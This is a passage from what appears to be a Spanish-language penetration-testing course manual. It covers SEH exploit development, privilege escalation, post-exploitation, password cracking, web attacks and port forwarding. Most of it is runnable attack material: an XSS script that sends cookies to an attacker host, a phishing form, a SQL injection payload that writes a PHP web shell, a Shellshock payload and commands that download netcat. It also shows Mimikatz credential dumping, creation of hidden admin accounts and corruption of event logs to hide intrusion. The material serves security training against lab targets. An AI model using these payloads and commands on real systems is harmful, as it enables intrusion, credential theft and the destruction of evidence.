Pues simplemente coloca ESP en el stack y se ejecuta nuestro shellcode.
104
ETHICAL HACKING
7.5.2.Structured Exception Handler (SEH )
Que son los manejadores de excepcin?
Un manejador de excepciones es una pieza de cdigo que se escribe dentro

de una aplicacin, con el fin de afrontar el hecho de que la aplicacin podra
generar un error (excepcin).
Un manejador de excepcin tpica se parece a esto:
105
ETHICAL HACKING
Cadena SEH:
Revisando SEH en immunity debugger
Ver todos los manejadores de excepciones:
106
ETHICAL HACKING
Ver el comienzo de la cadena SEH:

Introducir FS:[0] como expresion
107
ETHICAL HACKING
Pasos para desarrollar exploit:
a) Causar una excepcin

b) Determinar el offset (Desde que carcter se sobreescribe nseh?)
c) Encontrar POP/POP/RET en una libreria sin la proteccin SAFESEH
d) Sobreescribir Exception hander (seh) con la direccin de POP/POP/RET
e) Sobreescribir Next Exception hander (nseh)
SHORT JMP (4 bytes) = "\xeb\x06\x90\x90". Generalmente un
salta de 6 bytes es suficiente, pero a veces se requiere un salto mas
largo.
LONG JMP (5 bytes) = "\xe9\x70\xfe\xff\xff". Generalmente
usaso para saltos hacia atras. -400 = FFFFFE70. Salta 400 bytes hacia
atras 1
Payload tpico= offset + nseh + seh + nop + shellcode
Flujo de la explotacin:
1
http://www.free-test-online.com/binary/signed_converter.html
108
ETHICAL HACKING
Ejemplo Easy chat:
/root/Desktop/Laboratorio/Lab5-exploits/win/SEH/easychat
a) Causar una excepcin y determinar el offset (script1.rb)
109
ETHICAL HACKING
En immunity debugger para acceder a los breakpoints (SEH)

presionar: SHIFT+F7 y luego F9 hasta que llegue al breakpoint
Buscar DLL sin proteccion SAFESEH
!mona nosafesehaslr
Dentro de la DLL sin proteccin buscar POP/POP/RET
!mona seh -cpb "\x00\x40\x0a\x0d"
Alternativamente podemos buscar POP/POP/RET mediante

Find sequence of commands
Para obtener una shell ejecutar sin immunity debugger
110
ETHICAL HACKING
8
ESCALAMIENTO DE
PRIVILEGIOS
111
ETHICAL HACKING
VIII. ESCALAMIENTO DE PRIVILEGIOS

8. Anillos de proteccin de los sistemas operativos
Windows usa:
ring 0 ( kernel mode )
ring 3 ( user mode.)
Linux usa:
ring 0 for kernel y controladores
ring 2 for cdigo privilegiado
ring 3 for cdigo NO-privilegiado
112
ETHICAL HACKING
8.1. Escalamiento en Windows
Actualmente se usa mas Windows 7:
Fuente: thehackernews.com2
8.1.1.Enumeracin
El primer paso es enumerar que privilegios tenemos actualmente.
Info:
/opt/post-explotation/Windows
2
http://thehackernews.com/2016/02/windows-10-upgrade.html
113
ETHICAL HACKING
Enumerar con WMIC (Windows Management Instrumentation

Command-line)
wmic_enumeration.bat
genera out.html
Enumerar con comandos nativos
enumerate.bat
genera report.txt
8.1.2. Buscar passwords
Info:
Archivos con passwords:
Ir a la unidad C primero
Archivos que su nombre contenga pass/cred/vnc/config

dir /s *pass* == *cred* == *vnc* == *.config* > result.txt
Archivos que tengan en su contenido las palabra password (.ini y .txt)

findstr /si password *.xml *.ini *.txt
Passwords en el registro
reg query HKCU /f pass /t REG_SZ /s
114
ETHICAL HACKING
reg query HKLM /f pass /t REG_SZ /s
Archivos unattend, sysprep que puedan contener passwords
cd C:\Windows\Panther
dir /s unattend.xml == autounattend.xml == sysprep.xml == syspref.inf
cd C:\Windows\System32
dir /s unattend.xml == autounattend.xml == sysprep.xml == syspref.inf
Tipicamente estos archivos se usan para instalar actualizaciones en

varios equipos al mismo tiempo.
post/windows/gather/enum_unattend
* Solo busca el archivo unateend.xml
Exportar configuraciones wireless
netsh wlan export profile key=clear
8.1.3.Buscar autoruns perdidos
/usr/share/windows-binaries/
autorunsc.exe -a * > auto.txt
type auto.txt | findstr "File\ not\ found"
115
ETHICAL HACKING
8.1.4.DLL hijacking Windows (WinXP,Win2003,Win7)
Esta tcnica consiste en buscar servicios que intentan cargar DLL que no
existen, Podemos reemplazar con nuestra propia DLL.
Una aplicacion buscan DLL en el siguente orden:
1. The directory from which the application loaded

2. 32-bit System directory (C:\Windows\System32)
3. 16-bit System directory (C:\Windows\System)
4. Windows directory (C:\Windows)
5. The current working directory (CWD)
6. Directories in the PATH environment variable (system then user)
Windows 7 (32/64)
Servicio DLL no encontrada

IKE and AuthIP IPsec Keying Modules wlbsctrl.dll
(IKEEXT)
Windows Media Center Receiver ehETW.dll
Service (ehRecvr)
116
ETHICAL HACKING
Windows Media Center Scheduler ehETW.dll

Service (ehSched)
Windows XP

Automatic Updates (wuauserv) ifsproxy.dll
Remote Desktop Help Session SalemHook.dll
Manager (RDSessMgr)
Remote Access Connection Manager ipbootp.dll
(RasMan)
Windows Management wbemcore.dll
Instrumentation (winmgmt)
Otros servicios no instalados por defecto

Audio Service (STacSV) SFFXComm.dll SFCOM.DLL
Intel(R) Rapid Storage Technology DriverSim.dll
(IAStorDataMgrSvc)
Juniper Unified Network dsLogService.dll
Service(JuniperAccessService)
Encase Enterprise Agent SDDisk.dll
Usaremos Windows 7 (32bits) y la DLL wlbsctrl.dll para este ejemplo.
Revisando los permisos de escritura de los directorios del PATH
1opt/powershell/pathperm.ps1
powershell.exe -executionpolicy bypass -file pathperm.ps1
117
ETHICAL HACKING
Confirmamos que tenemos permisos de modificacin en el directorio

c:/perl/bin
icacls c:\Perl\bin
Si un servicio tiene permisos de Everyone (F) tambien tenemos permisos de

escritura
Software instalado en la raiz C: tiene permisos de modificacin

para usuarios autentificados
Simplemente generamos y adicionamos nuestro dll malicioso wlbsctrl.dll en

la ruta c:\Perl\bin y esperamos un reinicio.

LPORT=443 -f dll > wlbsctrl.dll
118
ETHICAL HACKING
8.2. Linux
8.2.1.Enumeracin
Info:
El primer paso es enumerar que privilegios tenemos actualmente.
bash LinEnum.sh > enum1.txt
python linuxprivchecker.py > enum2.txt
/opt/post-explotation/Linux
Buscar archivos con malos permisos (Cron)
find / -perm -2 -type f 2>/dev/null | grep etc
119
ETHICAL HACKING
9
POST
EXPLOTACION
120
ETHICAL HACKING
IX.POST EXPLOTACION
9. Comandos windows
Crear usuarios local
net user james password /add

net localgroup Administrators james /add
Crear usuarios dominio
net user georgia2 password /add /domain

net group "Domain Admins" georgia2 /add /domain
9.1. Transferencia de archivos
FTP
Info:
Configurando el servidor (KALI)
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome
/etc/init.d/pure-ftpd restart
121
ETHICAL HACKING
Configurando el cliente (Windows 7,8, etc)
echo open 192.168.80.167 21 > ftp.txt

echo offsec>> ftp.txt
echo mypass >> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
VBScript
Info:
Crear archivo wget.vbs
echo strUrl = WScript.Arguments.Item(0) >> wget.vbs

echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >>
wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >>
wget.vbs
echo If http Is Nothing Then Set http =
CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
122
ETHICAL HACKING
echo http.Send >> wget.vbs

echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo strData = "" >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,
1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
Ejecutar script
cscript wget.vbs http://192.168.80.167/nc.exe nc.exe
Powershell
Info:
Crear archivo wget.ps1
echo $StorageDir = $pwd > wget.ps1

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.80.167/nc.exe" >>wget.ps1
echo $file = "new-exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
Ejecutar script
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive

-NoProfile -File wget.ps1
123
ETHICAL HACKING
9.2. Extraer hashes de Security Account Manager (SAM)
Info:
fgdump.exe
Generara el archivo: 127.0.0.1.pwdump
9.3. Extraer hashes y password de memoria (LSASS)
Con esta tcnica tambin se puede extraer los hashes de usuarios de otros
equipos que se logearon en ese equipo (RDP, terminal service, etc).
WCE
Info:
Tratar de extraer en texto plano (de memoria)
wce.exe -w
Algunos antivirus lo detectan como virus
124
ETHICAL HACKING
Mimikats
Info:
Dependiendo del mtodo de autenticacion y el sistema operativo usado se

puede extraer diferente informacin:
module ~ sekurlsa: Este modulo extrae password, keys, pin codes, tickets
Obtener privilegios de depuracin
privilege::debug
Extraer password y hashes
125
ETHICAL HACKING
sekurlsa::logonpasswords
sekurlsa::kerberos
9.4. Escaneo desde la maquina comprometida
Cuando la red interna es muy grande escanearlo mediante pivoteo es muyyy

lento. Es mejor subir herramientas y ejecutarlas directamente desde la
maquina comprometida.
usr/share/windows-binaries/
Nbtscan
Info:
nbtscan.exe 192.168.0.0/24
Nmap
Info:
SP2+
Instalar Microsoft Visual C++ 2010 Redistributable Package
vcredist_x86.exe /q
Ejecutar normalmente:
126
ETHICAL HACKING
nmap.exe -n -Pn -A 10.0.0.0/24
9.5. Borrando huellas
Corromper logs
Info:
Detener servicio (consola windows)
net stop eventlog /y
Descargar los logs (meterpreter)
Download security.evtx
Corromperlos con un editor hexadecimal (KALI)
bless security.evtx
Adicionar caracteres 0D
127
ETHICAL HACKING
Subir los logs (meterpreter)
upload security.evtx
Iniciar servicio (consola windows)
net start eventlog
128
ETHICAL HACKING
10
PASSWORD
ATTACKS
129
ETHICAL HACKING
X. PASSWORD ATTACKS
De donde se obtienen los hashes?
a) SQL Inyeccion
Cuando un sitio web tiene una vulnerabilidad de SQL Inyeccion es posible

hacer un backup de la base de datos. Generalmente solo estar almacenado
hashes de los passwords.
b) Backups
Revisando la red a veces se encuentran backups de base de datos
c) Equipos comprometidos
10. Online
findmyhash MD5 -h e206a54e97690cce50cc872dd70ee896
Algoritmos mas importantes soportados:
MD4
MD5
SHA1
SHA256
SHA512
LM
NTLM
MYSQL
CISCO7
JUNIPER
Tambin podemos usar la web:
130
ETHICAL HACKING
https://hashkiller.co.uk/default.aspx
Algoritmos importantes soportados:
MD5
SHA1
NTLM
10.1. Ataque de diccionario
10.1.1. Password profiling
Diccionario base
Primero necesitamos crear un diccionario base. Extraemos las palabras clave

del sitio web
cewl www.megacorpone.com -m 4 -w megacorp-cewl.txt
m: numero mnimo de letras

w: archivo de salida
Se recomienda limpiar los palabras no relevantes
Ampliando el diccionario:
Nombre de la empresa y variantes

Nombres de departamentos (Marketing,sistemas,etc)
Sucursales (Sucre,cochabamba,etc)
Adicionalmente se puede agregar datos personales del objetivo:

Nombre de usuario (avargas,cgutierrez,etc)
131
ETHICAL HACKING
Cdula o nmeros celular (74124353,etc)

Nombres Propios (alejandra, alberto, etc..)
Apellidos (Viscarra,perez,etc)
Hobby (deportes,musica,pelculas, etc)
Usando patrones comunes
Fuente: wikipedia3
Creando reglas a partir de patrones
REGLA 1: Password + 2 dgitos

REGLA 5: Password + 2 dgitos + 1 carcter especial
3
http://en.wikipedia.org/wiki/2012_LinkedIn_hack
132
ETHICAL HACKING
REGLA 8: Password + 1 carcter especial + 2 digitos

REGLA 9: Password + 1 carcter especial + 3 digitos
REGLA 10: Mutar s/$ , a/@ , l/1, e/3, g/9, i=1, o=0
REGLA 11: Volver Mayuscula la primera letra
Aplicar patrones comunes al diccionario base
Las reglas anteriores ya estn programadas en el script

password-pattern.sh, solo tenemos que llamarlo con el archivo diccionario
base, este generara el archivo password-personalizado.txt.
password-pattern.sh password.txt full
full = Aplica todas las reglas

small = Aplica solo algunas reglas (Para ataques online)
El script password-pattern.sh hace uso de John the ripper para aplicar las
reglas (/etc/john/john.conf)
$[0-9] --> Adiciona nmeros al final del password

^[A-Z] --> Adiciona letras mayscula al principio del password
sXY --> Substituye X por Y
c --> Vuelve mayuscula la primera letra
Por cada palabra del diccionario base se generara 407.000. Se

recomienda no tener mas de 150-200 passwords en el diccionario base
Hasta ahora tenemos el archivo password-personalizado.txt con los

patrones aplicados al diccionario base, copiarlo al directorio que tiene los
dems passwords.
mv password-personalizado.txt /usr/share/wordlist
133
ETHICAL HACKING
En el directorio /usr/share/wordlist existen otros lista de passwords

comunes:
community-string.txt
Password-comunes.txt
real.txt (password reales)
Apellidos.txt
*digits.txt
Crackeando NTLM
hashcat -m 1000 -a 0 hash.txt /usr/share/wordlists/ -o cracked.txt
-m 1000 = Modulo (NTLM)

-a 0 = modo ataque (directo)
hash.txt = solo hash, sin usuario ni otro dato
0 = ataque directo
3 = fuerza bruta
10.2. Crakeando passwords usando GPU
GPU (Graphics Processing Unit) son miles de veces mas rapidos que los
procesadores corrientes.
Usando Amazon Elastic Compute Cloud (Amazon EC2)
Registrarse: http://aws.amazon.com/
Instalar la instancia: Amazon Linux GRID AMI
Descargar el ultimo driver de :
134
ETHICAL HACKING
http://www.nvidia.com/Download/Find.aspx
Product Type: GRID

Product Series: GRID Series
Product: K520
Operating System: Linux 64-bit
Actualizar y configurar sistema
sudo yum update -y

sudo yum install kernel-devel-`uname -r`
sudo yum-config-manager --enable epel
sudo yum install -y p7zip
sudo reboot
Instalar drivers
bash NVIDIA-Linux-x86_64-346.72.run
Accepted the license

Yes to registering the kernel module sources with DKMS
Yes to installing the 32-bit compatibility libraries
Yes to running the nvidia-config utility
OK to acknowledge the X config file was updated
Despues de reiniciar comprobar que se instalo los drivers
nvidia-smi -q | head
Descargar hashcat para Nvidia
wget http://hashcat.net/files/cudaHashcat-2.01.7z
Desenpaquetar
7za x cudaHashcat-1.36.7z
135
ETHICAL HACKING
Testear hashcat
/opt/cuda/cudaHashcat64.bin -b
Ataque de fuerza bruta a un hash NTLM
/opt/cuda/cudaHashcat64.bin -m 1000 -a 3 hash.txt ?a?a?a?a?a?a?a
-m 1000 : NTLM
-a 3 = fuerza bruta
?a?a?a?a?a?a?a = Mascara
Se puede usar los siguientes charsets en la mascara:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = espacio!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
Ataque de fuerza bruta a WPA
Convertir .cap en .hccap: https://hashcat.net/cap2hccap/
/opt/cuda/cudaHashcat64.bin -m 2500 -a3 fil.hccap ?a?a?a?a?a?a?a?a?a
-m 2500: WPA/WPA2
-a 3: Fuerza bruta
?a?a?a?a?a?a?a?a?a = Mascara (Usar todos los caracteres)
Velocidad promedio de crackeo 40240 Hashes/segundo
136
ETHICAL HACKING
10.3. Pass the hash
Cuando NO podemos crackear el has podemos usar esta tcnica que permite a
un atacante para autenticarse a un servidor mediante el hash en lugar de
requerir la contrasea en texto plano.
Info:
Server2003 Server2008
Realizando PTH desde kali:
pth-winexe -U [usuario]%[hash] //[ip-windows] cmd
Realizando PTH con WCE desde un windows:
/usr/share/windows-binaries/PSTools
wce -s Administrador:[nombre-pc]:[hash]
net use \\[nombre-pc]\admin$ /u:[nombre-pc]\Administrador
psexec \\[nombre-pc] cmd.exe -accepteula
Donde el formato es:

[hash]=efce164a921caaad3b435b51404ee:32ed87bdb5fdc5e9cba8854737681
137
ETHICAL HACKING
10.4. Ataques online
Creando un diccionario personalizado
Crearemos diccionario para ataques online en base a una lista bsica de

passwords de no mas de 10 palabras (Incluir nombre de la empresa,
sucursales u otras palabras relevante) pass.txt a la cual aplicaremos
patrones comunes (small)
password-patter.sh pass.txt small

El diccionario resultante lo concatenamos el diccionario de password
comunes: /usr/share/wordlists/password-comunes.txt
Finalmente adicionamos nombres de usuarios que descubramos
Atacando servicios
FTP - Ataque a diccionario
patator ftp_login host=[IP] user=[usuario] password=FILE0

0=password.lst -x ignore:fgrep='Login incorrect'
SSH- Ataque a diccionario
patator ssh_login host=[IP] user=[usuario] password=FILE0

0=password.lst -x ignore:fgrep='Permission denied'
Telnet
patator telnet_login host=192.168.0.100 inputs='FILE0\nFILE1'

0=users.txt 1=passwords.txt persistent=0
prompt_re=Username:|Password: -x ignore:egrep=Login incorrect
138
ETHICAL HACKING
Pop3
patator pop_login host=[ip-server] user=nrojas password=FILE0

0=password.lst -x ignore:fgrep='Permission denied'
SMTP
patator smtp_login host=[ip-server] user=nrojas password=FILE0

0=password.lst [helo='ehlo localhost'] -x ignore:fgrep='Permission
denied'
HTTP - Ataque a diccionario
patator http_fuzz url=[URL] method=POST

body='login=[usuario]&password=FILE0&form=submit' 0=password.txt
follow=1 -x ignore:fgrep='Invalid credential'
RDP
ncrack -v -f --user myuser -P pass.txt rdp://192.168.80.128
-f: sallir cuando se encuentre una credencial valida
Protocolos que son mas rpidos para ataques de passwords:
1. FTP
2. SSH
3. telnet
139
ETHICAL HACKING
11
WEB ATTACKS
140
ETHICAL HACKING
XI.HACKING WEB APPLICATIONS
Puertos tpicos HTTP
Port HTTP
80 Puerto por defecto
81 Puerto alternativo
443 SSL
8080 Apache tomcat
7777 Oracle Server
9090 Cherokee/WebSphere
10000 Webmin
8443 Apache Tomcat SSL
5357 Web services
11. Identificar puntos de entrada

El primer paso es mapear el sitio web.
Crawling
Visita los links que tiene el sitio web mostrando su estructura.
owasp-zap
Click derecho en el objetivo (dominio) > attack > spider

Report > Export all URL to file
Web Fuzzing
Prueba una lista de directorios para confirmar si existen.
dirbuster
141
ETHICAL HACKING
Usar:
/usr/share/dirb/wordlists/spanish.txt (5000+ Entradas)

/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt (220.000+
Entradas)
11.1. XSS (Cross-site scripting)
XSS es un tipo de inseguridad informtica tpico de las aplicaciones Web, que

permite a una tercera parte inyectar en pginas web visitadas por el usuario
cdigo JavaScript
Se ataca al navegador web
Tipos de XSS
142
ETHICAL HACKING
Session hijacking
Usar http://[ip-bee-box]/bWAPP/xss_get.php
Escuchar en el puerto 80 (KALI)
nc -nlvp 80
Cdigo para robar cookies
<script>
var img = new Image();
img.src = "http://[IP-atacante]/xss.php?"+document.cookie;
</script>
Codificar todo en burpsuite (URL encode)
Phishing
Escuchar en el puerto 80 (KALI)
nc -nvlp 80
Cdigo HTML
<br>
<FORM action="http://[IP]/xss.php" method="post">
Usuario <input type="text" name="username"> <br>
Password:<input type="password" name="pass"> <br>
<INPUT type="submit" value="Send">
</FORM>
Codificar todo en burpsuite
Redireccion
<script> window.location = "http://www.google.com/" </script>
143
ETHICAL HACKING
Deface
<script>document.body.innerHTML="<H1>
HACKED by me</H1>"</script>
<body onload="document.write('HACKED by ME again')">
Ofuscando XSS
<script>alert(/sitio comprometido otra vez/.source);</script>
<script> a=alert;a(9)</script>
Alternativamente se puede usar ASCII
Version normal
<script>alert(1)</script>
Usando ASCII
<script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49,
41))</script>
Usar el addon hackbar de firefox:
144
ETHICAL HACKING
DoS apache (firefox 30+)
<script>
for (var i=0;i<400;i++){
var img = new Image();
var url = "ftp://[ip-victima]:80/?"+i;
img.src = url;
}
</script>
Codificar en burpsuite
11.1.1. Frameworks de explotacin
Xenotix (windows 8)
145
ETHICAL HACKING
Information Gathering
WAF Detection
Victim fingerprint
IP to geolocation
Network
Network IP (IP de la victima)
Ping Scan (GET puerto 80)
Browser
Fingerprint
Features detector
Scanner
Get scanner
http://www.altoromutual.com/search.aspx?txtSearch=abc
XSS explotation
Send message
Cookie thief
Keylogger
Grab screenshot (a veces )
Social engineering
Phiser - buscar logs.txt
Java driven by windows
Firefox addon
146
ETHICAL HACKING
11.2. INYECCION SQL
Inyeccin SQL es un mtodo de infiltracin de cdigo intruso que se vale de

una vulnerabilidad informtica presente en una aplicacin en el nivel de
validacin de las entradas para realizar operaciones sobre una base de datos.
Metodologa
Information gathering
SQLi detection
Lauch attack
Extract data
OS interaction (upload/download Files)
Compromise the network
147
ETHICAL HACKING
Identificar uso de una BD y errores de SQLi
MySQL error
You have an error in your SQL syntax;
Oracle error
ORA-00933: SQL command not properly ended
ODBC error
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
MS-SQL error
Microsoft SQL Native Client error %u201880040e14%u2019

Unclosed quotation mark after the character string
MSSQL ASPX Error
Server Error in '/' Application
PostgreSQL error
PSQLException: ERROR: unterminated quoted string at or near "'" Position: 1

or
Query failed: ERROR: syntax error at or near
148
ETHICAL HACKING
Estructura de una inyeccin
El Balanceo tiene el objetivo de anular la consulta actual, generalmente

introducimos:
-1
abc
null
Probar login
URL de prueba: http://www.altoromutual.com/bank/main.aspx
Consulta:
select * from users where user=$user and password=$passwrd limit 0,1;
Payloads
' or true--
' or ''='
' or 1--
' or 'x'='
'or '1'='1'--
Consulta:
select * from users where user=('$user') and password=('$passwrd') limit 0,1;
149
ETHICAL HACKING
Payloads a probar
') or true--
') or ('')=('
') or 1--
') or ('x')=('
') or '1' ='1--
11.2.1. Tipos de SQLi
11.2.2. ERROR BASED
Se provoca un error en la consulta, pero con el mensaje de error recolectamos

informacin.
MS-SQL
URL de prueba: http://testasp.vulnweb.com/showforum.asp?id=1
Extraer la version del gestor de base de datos:
150
ETHICAL HACKING
http://testasp.vulnweb.com/showforum.asp?id=convert(int,@@version)
http://testasp.vulnweb.com/showforum.asp?id=1 and @@version=1--
MySQL
URL de prueba: http://[bee-box-ip]/bWAPP/sqli_1.php
Extraer base de datos actual
1' and (select 1 from (Select count(*),Concat((select database()),0x3a,floor(rand(0)*2))

as y from information_schema.tables group by y) as x) #
Extraer nombres de tablas
1' and (select 1 from (Select count(*),Concat((select table_name from

information_schema.tables where table_schema='bWAPP' limit
0,1),0x3a,floor(rand(0)*2)) as y from information_schema.tables group by y) as x) #
Extraer nombres de columnas
1' and (select 1 from (Select count(*),Concat((select column_name from

information_schema.columns where table_schema='bWAPP' and table_name='users'
limit 0,1),0x3a,floor(rand(0)*2)) as y from information_schema.tables group by y) as
x) #
Extraer una tupla
1' and (select 1 from (Select count(*),Concat((select concat(id,login,password) from

bWAPP.users limit 0,1),0x3a,floor(rand(0)*2)) as y from information_schema.tables
group by y) as x) #
151
ETHICAL HACKING
PostgreSQL
123' AND 4647=CAST((CHR(122)||CHR(122)||CHR(122))||(SELECT direccion FROM

public.t_persona OFFSET 0 LIMIT 1)::text||(CHR(122)||CHR(122)||CHR(122)) AS
NUMERIC) AND '1'='1
11.2.3. UNION BASED
Extraccin de datos (Mysql)
URL de prueba: http://192.168.2.7/bWAPP/sqli_1.php
Descubrir numero de columnas (string)
abc' order by 15 #
Encontrar consulta base, probar:
abc' UNION ALL SELECT 1,2,3,4,5,6,7#

111
abc' UNION ALL SELECT '1','2','3','4','5','6','7'#
abc' UNION ALL SELECT "1","2","3","4","5","6","7"#
abc' UNION ALL SELECT null,null,null,null,null,null,null #
abc' UNION ALL SELECT 0x31,0x32,0x33,0x34,0x35,0x36,0x37#
abc' UNION ALL SELECT x'31',x'32',x'33',x'34',x'35',x'36',x'37' #
152
ETHICAL HACKING
Si no se anula la consulta inicial modificar el balanceo
abc' and 0 union select 1,2,3,4,5--

abc' and false union select 1,2,3,4,5--
null union select 1,2,3,4,5--
abc' && 0 union select 1,2,3,4,5--
Extrayendo informacin sobre la base de datos (MySQL)
Para realizar la extraccin de datos usamos la base de datos:

information_schema, que contiene informacin sobre tablas y columnas de las
dems bases de datos.
Numero de base de datos
abc' UNION ALL SELECT 0,(SELECT COUNT(schema_name) FROM

information_schema.SCHEMATA),0,0,0,0,0#
Nombre de bases de datos
abc' UNION ALL SELECT 1,(SELECT schema_name FROM

information_schema.SCHEMATA LIMIT 0,1),3,4,5,6,7#
Nombre de tablas
abc' UNION ALL SELECT 1,(SELECT table_name FROM

information_schema.TABLES WHERE table_schema="bWAPP" LIMIT 0,1),
3,4,5,6,7#
Nombre de columnas
abc' UNION ALL SELECT 1,(SELECT column_name FROM

information_schema.COLUMNS WHERE table_schema="bWAPP" AND
table_name="users" LIMIT 0,1),3,4,5,6,7#
153
ETHICAL HACKING
Extraer 1 tupla de la base de datos
abc' UNION ALL SELECT 1,(SELECT

concat_ws(';',id,login,password,email,secret,activation_code,activated,reset_c
ode,admin) FROM bWAPP.users LIMIT 0,1),3,4,5,6,7#
Extraer 10 tuplas de la base de datos usando group_concat (Tiene el limite de

1024 caracteres)
abc' UNION ALL SELECT 1,(select group_concat(title,0x3a,imdb,0x7e) from

(select title,imdb from movies limit 0,10) AS mitabla),3,4,5,6,7#
0x3a = :
0x7e = ~
Usando CAST para extraer 100 o mas tuplas (hasta 8192 caracteres)
abc' UNION ALL SELECT 1,(select CAST(group_concat(title,0x3a,imdb,0x7e)
AS CHAR(8192)) from (select title,imdb from movies limit 0,100) AS
mitabla),3,4,5,6,7#
Evil twin injection: Hacer un mapeo de las bases de datos > tablas > columnas
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from

(information_schema.columns) where (table_schema>=@) and (@)in
(@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' >
',column_name))))a),5,6,7 #
Extraccin automatizada (sqlmap)
sqlmap -u "http://[ip]/bWAPP/sqli_1.php?title=iron&action=search"
--timeout=300 --random-agent --cookie="key=valor" --dbs
154
ETHICAL HACKING
Para mas detalles de uso de sqlmap ver: Explotacin automtica (sqlmap)
Extraccin de datos (MSSQL)
URL de prueba: http://testasp.vulnweb.com/showforum.asp?id=1
Descubrir numero de columnas (string)
-1 order by 2 --
Descubrir consulta base
-1 UNION ALL SELECT 1,2 --
Numero de base de datos
-1 UNION ALL SELECT (SELECT COUNT(name) FROM

master..sysdatabases),0 --
Extraccin automatizada con sqlmap:
sqlmap -u "http://testasp.vulnweb.com/showforum.asp?id=1"
--timeout=300 --random-agent --technique=U --dbms=mssql --dbs
Interactuar con el sistema archivos (bee-box)
URL de prueba: http://192.168.2.7/bWAPP/sqli_1.php
Leer un archivo
a' UNION ALL SELECT 1,(SELECT LOAD_FILE("/etc/passwd")),3,4,5,6,7#
155
ETHICAL HACKING
Leer un archivo (Consulta sin comillas)
a' UNION ALL SELECT 1,(SELECT

concat(0x7e,load_file(0xHEXCODE),0x7e)),3,4,5,6,7#
0xHEXCODE = cdigo hexadecimal de la ruta del archivo

/etc/passwd = 0x2f6574632f706173737764
Escritura de archivos
URL: http://[ip-beebox]/bWAPP/sqli_13.php
Mini php shell
a' UNION SELECT 1,"<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE

"/var/www/bWAPP/images/backdoor.php" #
Subimos al directorio imagenes porque tiene permisos de escritura
Escribir archivo (php uploader)
xxx' UNION ALL SELECT 1,(SELECT 0xHEXCODE INTO OUTFILE

"/var/www/bWAPP/images/upload.php"),3,4,5,6,7#
0xHEXCODE = cdigo hexadecimal

Ej: Formulario para subir archivos
156
ETHICAL HACKING
11.3. Control de acceso
Local File Inclusion (LFI)/ Directory traversal
LFI el archivo es cargado y ejecutado

Directory traversal slo le da la capacidad de leer el archivo
Generar payload
dotdotpwn.pl -m stdout -f /etc/passwd -o unix > payloads.txt
11.4. Usar componentes vulnerables
Heartbleed (2014)
157
ETHICAL HACKING
Confirmar vulnerabilidad
nmap -p 8443 --script ssl-heartbleed 192.168.0.103
Explotar vulnerabilidad
cd /opt/ssl
python heartbleed.py 192.168.0.103 8443
Shellshock (2014)
URL de prueba http://[ip-bee-box]/bWAPP/shellshock.php
Modificar el user-agent a:
() { fsfse;};echo \"Content-type: text/plain\"; echo; /bin/cat

/etc/passwd
158
ETHICAL HACKING
11.5. Web backdoors
Cuando el atacante ha comprometido un servidor web, puede crear un

backdoor para tener acceso al servidor cuando el quiera.
Webacoo
Generar backdoor (KALI)
webacoo -g -o test.php
Subir archivo generado al servidor comprometido:
Conectase al backdoor (Desde KALI)
webacoo -t -u http://192.168.0.102/test.php
Weevely
Generar backdoor y subir al servidor comprometido
weevely generate password back.php
Conectarse al backdoor
weevely http://192.168.1.103/bWAPP/images/back.php password
159
ETHICAL HACKING
12
PORT REDIRECTION
& TUNNELING
160
ETHICAL HACKING
XII. PORT REDIRECTION & TUNNELING

12. Port Fordwarding
Es la aplicacin de NAT (network address translation). Redirige una solicitud

de comunicacin de una combinacin de direccin y puerto a otra.
Victima Linux
El escenario considera que el atacante tiene una shell remota en un servidor

linux con permisos de root. Necesitamos tener instalado rinetd.
En el archivo /etc/rinetd.conf (victima linux) configurar
# bindadress bindport connectaddress connectport

192.168.80.40 3333 10.0.0.10 25
Iniciar el servicio
/etc/init.d/rinetd start
En el cliente (KALI)
nmap -sV -p3333 192.168.80.40
Victima Windows (Port Fordwarding con comandos windows)
161
ETHICAL HACKING

windows con permisos elevados.
En la victima windows:
netsh interface portproxy add v4tov4 listenport=3333

listenaddress=192.168.80.50 connectport=25 connectaddress=10.0.0.10
Imprimir las reglas de fordwarding
netsh interface portproxy show all
nmap -sV -p3333 192.168.80.50
